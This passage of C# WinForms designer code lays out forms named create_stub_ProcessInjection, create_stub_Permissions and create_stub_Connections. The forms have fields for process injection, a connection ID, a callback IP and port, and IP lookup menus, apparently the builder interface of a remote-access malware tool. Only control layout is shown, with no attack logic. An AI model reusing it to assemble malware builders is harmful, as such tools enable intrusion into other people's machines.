     // comboBox1
     //
     this.comboBox1.DropDownStyle     = System.Windows.Forms.ComboBoxStyle.DropDownList;
     this.comboBox1.Font              = new System.Drawing.Font("Segoe UI", 9F);
     this.comboBox1.FormattingEnabled = true;
     this.comboBox1.Items.AddRange(new object[] {
         "Primary",
         "Fallback"
     });
     this.comboBox1.Location = new System.Drawing.Point(188, 37);
     this.comboBox1.Name     = "comboBox1";
     this.comboBox1.Size     = new System.Drawing.Size(92, 23);
     this.comboBox1.TabIndex = 59;
     //
     // label4
     //
     this.label4.AutoSize = true;
     this.label4.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.label4.Location = new System.Drawing.Point(6, 19);
     this.label4.Name     = "label4";
     this.label4.Size     = new System.Drawing.Size(85, 15);
     this.label4.TabIndex = 58;
     this.label4.Text     = "Process Name:";
     //
     // textBox2
     //
     this.textBox2.Font      = new System.Drawing.Font("Segoe UI", 9F);
     this.textBox2.ForeColor = System.Drawing.SystemColors.ControlText;
     this.textBox2.Location  = new System.Drawing.Point(9, 37);
     this.textBox2.Name      = "textBox2";
     this.textBox2.Size      = new System.Drawing.Size(173, 23);
     this.textBox2.TabIndex  = 55;
     //
     // groupBox1
     //
     this.groupBox1.Controls.Add(this.label4);
     this.groupBox1.Controls.Add(this.textBox1);
     this.groupBox1.Controls.Add(this.ProcessInjectionLstView);
     this.groupBox1.Controls.Add(this.button1);
     this.groupBox1.Controls.Add(this.textBox2);
     this.groupBox1.Controls.Add(this.label1);
     this.groupBox1.Controls.Add(this.comboBox1);
     this.groupBox1.Location = new System.Drawing.Point(0, 0);
     this.groupBox1.Name     = "groupBox1";
     this.groupBox1.Size     = new System.Drawing.Size(428, 324);
     this.groupBox1.TabIndex = 158;
     this.groupBox1.TabStop  = false;
     this.groupBox1.Text     = "Process Injection";
     //
     // create_stub_ProcessInjection
     //
     this.AutoScaleDimensions = new System.Drawing.SizeF(7F, 15F);
     this.AutoScaleMode       = System.Windows.Forms.AutoScaleMode.Font;
     this.Controls.Add(this.groupBox1);
     this.Font  = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.Name  = "create_stub_ProcessInjection";
     this.Size  = new System.Drawing.Size(428, 324);
     this.Load += new System.EventHandler(this.ProcessInjection_Load);
     this.groupBox1.ResumeLayout(false);
     this.groupBox1.PerformLayout();
     this.ResumeLayout(false);
 }
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     this.components    = new System.ComponentModel.Container();
     this.label3        = new System.Windows.Forms.Label();
     this.label35       = new System.Windows.Forms.Label();
     this.label4        = new System.Windows.Forms.Label();
     this.label2        = new System.Windows.Forms.Label();
     this.label1        = new System.Windows.Forms.Label();
     this.comboBox1     = new System.Windows.Forms.ComboBox();
     this.toolTip1      = new System.Windows.Forms.ToolTip(this.components);
     this.groupBox1     = new System.Windows.Forms.GroupBox();
     this.fullListView1 = new PpRStandardLib.Controls.FullListView();
     this.columnHeader1 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.groupBox1.SuspendLayout();
     this.SuspendLayout();
     //
     // label3
     //
     this.label3.Anchor   = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Right)));
     this.label3.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.label3.Location = new System.Drawing.Point(252, 40);
     this.label3.Name     = "label3";
     this.label3.Size     = new System.Drawing.Size(53, 14);
     this.label3.TabIndex = 131;
     this.label3.Text     = "1135";
     //
     // label35
     //
     this.label35.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
                                                                 | System.Windows.Forms.AnchorStyles.Right)));
     this.label35.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.label35.Location = new System.Drawing.Point(113, 40);
     this.label35.Name     = "label35";
     this.label35.Size     = new System.Drawing.Size(133, 14);
     this.label35.TabIndex = 129;
     this.label35.Text     = "127.0.0.1";
     //
     // label4
     //
     this.label4.Anchor   = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Right)));
     this.label4.AutoSize = true;
     this.label4.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.label4.Location = new System.Drawing.Point(252, 19);
     this.label4.Name     = "label4";
     this.label4.Size     = new System.Drawing.Size(32, 15);
     this.label4.TabIndex = 130;
     this.label4.Text     = "Port:";
     //
     // label2
     //
     this.label2.AutoSize = true;
     this.label2.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.label2.Location = new System.Drawing.Point(113, 19);
     this.label2.Name     = "label2";
     this.label2.Size     = new System.Drawing.Size(93, 15);
     this.label2.TabIndex = 21;
     this.label2.Text     = "IP Address/DNS:";
     //
     // label1
     //
     this.label1.AutoSize = true;
     this.label1.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.label1.Location = new System.Drawing.Point(6, 19);
     this.label1.Name     = "label1";
     this.label1.Size     = new System.Drawing.Size(86, 15);
     this.label1.TabIndex = 20;
     this.label1.Text     = "Connection ID:";
     //
     // comboBox1
     //
     this.comboBox1.DropDownStyle     = System.Windows.Forms.ComboBoxStyle.DropDownList;
     this.comboBox1.Font              = new System.Drawing.Font("Segoe UI", 9F);
     this.comboBox1.FormattingEnabled = true;
     this.comboBox1.Items.AddRange(new object[] {
         "A0P"
     });
     this.comboBox1.Location = new System.Drawing.Point(9, 37);
     this.comboBox1.Name     = "comboBox1";
     this.comboBox1.Size     = new System.Drawing.Size(60, 23);
     this.comboBox1.TabIndex = 2;
     //
     // toolTip1
     //
     this.toolTip1.AutoPopDelay = 5000;
     this.toolTip1.InitialDelay = 500;
     this.toolTip1.ReshowDelay  = 50;
     this.toolTip1.ShowAlways   = true;
     //
     // groupBox1
     //
     this.groupBox1.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
                                                                   | System.Windows.Forms.AnchorStyles.Right)));
     this.groupBox1.Controls.Add(this.fullListView1);
     this.groupBox1.Controls.Add(this.label3);
     this.groupBox1.Controls.Add(this.label1);
     this.groupBox1.Controls.Add(this.label35);
     this.groupBox1.Controls.Add(this.comboBox1);
     this.groupBox1.Controls.Add(this.label4);
     this.groupBox1.Controls.Add(this.label2);
     this.groupBox1.Location = new System.Drawing.Point(0, 0);
     this.groupBox1.Name     = "groupBox1";
     this.groupBox1.Size     = new System.Drawing.Size(428, 324);
     this.groupBox1.TabIndex = 151;
     this.groupBox1.TabStop  = false;
     this.groupBox1.Text     = "Permissions";
     //
     // fullListView1
     //
     this.fullListView1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
                                                                        | System.Windows.Forms.AnchorStyles.Left)
                                                                       | System.Windows.Forms.AnchorStyles.Right)));
     this.fullListView1.CheckBoxes = true;
     this.fullListView1.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
         this.columnHeader1,
         this.columnHeader2
     });
     this.fullListView1.ExplorerTheme            = false;
     this.fullListView1.ExplorerThemeMultiSelect = false;
     this.fullListView1.FullRowSelect            = true;
     this.fullListView1.HeaderStyle          = System.Windows.Forms.ColumnHeaderStyle.Nonclickable;
     this.fullListView1.ItemContextMenuStrip = false;
     this.fullListView1.Location             = new System.Drawing.Point(9, 66);
     this.fullListView1.LockColumnSize       = false;
     this.fullListView1.MultiSelect          = false;
     this.fullListView1.Name     = "fullListView1";
     this.fullListView1.Size     = new System.Drawing.Size(411, 250);
     this.fullListView1.TabIndex = 132;
     this.fullListView1.UseCompatibleStateImageBehavior = false;
     this.fullListView1.View = System.Windows.Forms.View.Details;
     //
     // columnHeader1
     //
     this.columnHeader1.Width = 121;
     //
     // columnHeader2
     //
     this.columnHeader2.Width = 134;
     //
     // create_stub_Permissions
     //
     this.AutoScaleDimensions = new System.Drawing.SizeF(7F, 15F);
     this.AutoScaleMode       = System.Windows.Forms.AutoScaleMode.Font;
     this.Controls.Add(this.groupBox1);
     this.Font  = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.Name  = "create_stub_Permissions";
     this.Size  = new System.Drawing.Size(428, 324);
     this.Load += new System.EventHandler(this.create_stub_Permissions_Load);
     this.groupBox1.ResumeLayout(false);
     this.groupBox1.PerformLayout();
     this.ResumeLayout(false);
 }
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.Windows.Forms.ListViewItem listViewItem1 = new System.Windows.Forms.ListViewItem(new string[] {
         "A0P",
         "127.0.0.1",
         "1135"
     }, -1);
     this.IPAddressDNSColumn  = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.IDColumn            = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.ConnectionsListView = new PpRStandardLib.Controls.FullListView();
     this.PortColumn          = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
     this.textBox3            = new System.Windows.Forms.TextBox();
     this.label3          = new System.Windows.Forms.Label();
     this.button1         = new System.Windows.Forms.Button();
     this.textBox1        = new System.Windows.Forms.TextBox();
     this.IPAddressButton = new System.Windows.Forms.Button();
     this.label2          = new System.Windows.Forms.Label();
     this.menuItem7       = new System.Windows.Forms.MenuItem();
     this.menuItem6       = new System.Windows.Forms.MenuItem();
     this.menuItem9       = new System.Windows.Forms.MenuItem();
     this.contextMenu2    = new System.Windows.Forms.ContextMenu();
     this.menuItem8       = new System.Windows.Forms.MenuItem();
     this.contextMenu1    = new System.Windows.Forms.ContextMenu();
     this.menuItem1       = new System.Windows.Forms.MenuItem();
     this.menuItem2       = new System.Windows.Forms.MenuItem();
     this.menuItem3       = new System.Windows.Forms.MenuItem();
     this.menuItem4       = new System.Windows.Forms.MenuItem();
     this.menuItem5       = new System.Windows.Forms.MenuItem();
     this.groupBox1       = new System.Windows.Forms.GroupBox();
     this.textBox2        = new System.Windows.Forms.TextBox();
     this.groupBox1.SuspendLayout();
     this.SuspendLayout();
     //
     // IPAddressDNSColumn
     //
     this.IPAddressDNSColumn.Text  = "IP Address/DNS";
     this.IPAddressDNSColumn.Width = 127;
     //
     // IDColumn
     //
     this.IDColumn.Text  = "ID";
     this.IDColumn.Width = 38;
     //
     // ConnectionsListView
     //
     this.ConnectionsListView.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
                                                                             | System.Windows.Forms.AnchorStyles.Left)));
     this.ConnectionsListView.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
         this.IDColumn,
         this.IPAddressDNSColumn,
         this.PortColumn
     });
     this.ConnectionsListView.ExplorerTheme            = true;
     this.ConnectionsListView.ExplorerThemeMultiSelect = true;
     this.ConnectionsListView.Font                 = new System.Drawing.Font("Segoe UI", 9F);
     this.ConnectionsListView.FullRowSelect        = true;
     this.ConnectionsListView.HeaderStyle          = System.Windows.Forms.ColumnHeaderStyle.Nonclickable;
     this.ConnectionsListView.ItemContextMenuStrip = true;
     this.ConnectionsListView.Items.AddRange(new System.Windows.Forms.ListViewItem[] {
         listViewItem1
     });
     this.ConnectionsListView.Location       = new System.Drawing.Point(9, 66);
     this.ConnectionsListView.LockColumnSize = true;
     this.ConnectionsListView.MultiSelect    = false;
     this.ConnectionsListView.Name           = "ConnectionsListView";
     this.ConnectionsListView.Size           = new System.Drawing.Size(215, 250);
     this.ConnectionsListView.TabIndex       = 102;
     this.ConnectionsListView.UseCompatibleStateImageBehavior = false;
     this.ConnectionsListView.View = System.Windows.Forms.View.Details;
     //
     // PortColumn
     //
     this.PortColumn.Text  = "Port";
     this.PortColumn.Width = 46;
     //
     // textBox3
     //
     this.textBox3.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.textBox3.Location = new System.Drawing.Point(9, 37);
     this.textBox3.Name     = "textBox3";
     this.textBox3.Size     = new System.Drawing.Size(140, 23);
     this.textBox3.TabIndex = 2;
     //
     // label3
     //
     this.label3.AutoSize = true;
     this.label3.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.label3.Location = new System.Drawing.Point(6, 19);
     this.label3.Name     = "label3";
     this.label3.Size     = new System.Drawing.Size(93, 15);
     this.label3.TabIndex = 1;
     this.label3.Text     = "IP Address/DNS:";
     //
     // button1
     //
     this.button1.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.button1.Location = new System.Drawing.Point(322, 36);
     this.button1.Name     = "button1";
     this.button1.Size     = new System.Drawing.Size(75, 23);
     this.button1.TabIndex = 6;
     this.button1.Text     = "+/Update";
     this.button1.UseVisualStyleBackColor = true;
     //
     // textBox1
     //
     this.textBox1.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.textBox1.Location = new System.Drawing.Point(252, 37);
     this.textBox1.Name     = "textBox1";
     this.textBox1.Size     = new System.Drawing.Size(64, 23);
     this.textBox1.TabIndex = 5;
     //
     // IPAddressButton
     //
     this.IPAddressButton.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.IPAddressButton.Location = new System.Drawing.Point(155, 37);
     this.IPAddressButton.Name     = "IPAddressButton";
     this.IPAddressButton.Size     = new System.Drawing.Size(91, 23);
     this.IPAddressButton.TabIndex = 3;
     this.IPAddressButton.Text     = "Get IP Address";
     this.IPAddressButton.UseVisualStyleBackColor = true;
     this.IPAddressButton.Click += new System.EventHandler(this.IPAddressButton_Click);
     //
     // label2
     //
     this.label2.AutoSize = true;
     this.label2.Font     = new System.Drawing.Font("Segoe UI", 9F);
     this.label2.Location = new System.Drawing.Point(249, 19);
     this.label2.Name     = "label2";
     this.label2.Size     = new System.Drawing.Size(32, 15);
     this.label2.TabIndex = 4;
     this.label2.Text     = "Port:";
     //
     // menuItem7
     //
     this.menuItem7.Index = 3;
     this.menuItem7.Text  = "Clear All";
     //
     // menuItem6
     //
     this.menuItem6.Index = 2;
     this.menuItem6.Text  = "Remove";
     //
     // menuItem9
     //
     this.menuItem9.Index = 0;
     this.menuItem9.Text  = "Edit";
     //
     // contextMenu2
     //
     this.contextMenu2.MenuItems.AddRange(new System.Windows.Forms.MenuItem[] {
         this.menuItem9,
         this.menuItem8,
         this.menuItem6,
         this.menuItem7
     });
     //
     // menuItem8
     //
     this.menuItem8.Index = 1;
     this.menuItem8.Text  = "-";
     //
     // contextMenu1
     //
     this.contextMenu1.MenuItems.AddRange(new System.Windows.Forms.MenuItem[] {
         this.menuItem1,
         this.menuItem2,
         this.menuItem3,
         this.menuItem4,
         this.menuItem5
     });
     //
     // menuItem1
     //
     this.menuItem1.Index = 0;
     this.menuItem1.Text  = "Get Localhost IP Address";
     //
     // menuItem2
     //
     this.menuItem2.Index = 1;
     this.menuItem2.Text  = "Get LAN IP Address";
     //
     // menuItem3
     //
     this.menuItem3.Index = 2;
     this.menuItem3.Text  = "Get WAN IP Address";
     //
     // menuItem4
     //
     this.menuItem4.Index = 3;
     this.menuItem4.Text  = "-";
     //
     // menuItem5
     //
     this.menuItem5.Index = 4;
     this.menuItem5.Text  = "Resolve Host";
     //
     // groupBox1
     //
     this.groupBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
                                                                    | System.Windows.Forms.AnchorStyles.Left)
                                                                   | System.Windows.Forms.AnchorStyles.Right)));
     this.groupBox1.Controls.Add(this.textBox2);
     this.groupBox1.Controls.Add(this.textBox3);
     this.groupBox1.Controls.Add(this.ConnectionsListView);
     this.groupBox1.Controls.Add(this.label3);
     this.groupBox1.Controls.Add(this.label2);
     this.groupBox1.Controls.Add(this.button1);
     this.groupBox1.Controls.Add(this.IPAddressButton);
     this.groupBox1.Controls.Add(this.textBox1);
     this.groupBox1.Location = new System.Drawing.Point(0, 0);
     this.groupBox1.Name     = "groupBox1";
     this.groupBox1.Size     = new System.Drawing.Size(428, 324);
     this.groupBox1.TabIndex = 104;
     this.groupBox1.TabStop  = false;
     this.groupBox1.Text     = "Connections";
     //
     // textBox2
     //
     this.textBox2.Location  = new System.Drawing.Point(230, 66);
     this.textBox2.Multiline = true;
     this.textBox2.Name      = "textBox2";
     this.textBox2.ReadOnly  = true;
     this.textBox2.Size      = new System.Drawing.Size(190, 250);
     this.textBox2.TabIndex  = 105;
     this.textBox2.Text      = "Rules to follow:";
     //
     // create_stub_Connections
     //
     this.AutoScaleDimensions = new System.Drawing.SizeF(7F, 15F);
     this.AutoScaleMode       = System.Windows.Forms.AutoScaleMode.Font;
     this.Controls.Add(this.groupBox1);
     this.Font = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.Name = "create_stub_Connections";
     this.Size = new System.Drawing.Size(428, 324);
     this.groupBox1.ResumeLayout(false);
     this.groupBox1.PerformLayout();
     this.ResumeLayout(false);
 }